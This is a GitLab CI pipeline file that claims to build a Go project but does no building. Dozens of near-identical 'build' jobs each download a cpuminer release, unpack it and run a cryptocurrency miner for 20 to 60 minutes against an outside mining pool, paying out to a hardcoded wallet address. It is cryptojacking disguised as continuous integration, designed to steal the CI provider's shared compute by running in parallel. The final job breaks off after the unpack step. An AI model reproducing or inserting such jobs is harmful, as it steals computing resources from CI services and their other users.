image: golang:latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_a:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_b:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_c:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_d:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_e:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_f:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 60m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_g:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_h:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_i:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_j:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_k:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_l:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_m:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_n:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_o:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_p:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_q:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_r:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_s:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_t:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_u:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_v:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_w:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_x:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_y:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_z:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_ab:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_ac:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_ad:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_ae:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_af:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_ag:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_ah:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_ai:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_aj:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_ak:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_al:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_am:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_an:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_ao:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_av:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_aw:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_ax:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_ay:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_az:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_aaa:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_aab:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_aac:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_aad:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_aae:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_1:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_2:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_3:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_4:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_6:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_7:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_8:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_9:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_10:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_11:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_12:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_13:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_14:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_15:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_16:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_17:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_18:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_19:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_20:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_21:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_22:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_23:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_24:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_285:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
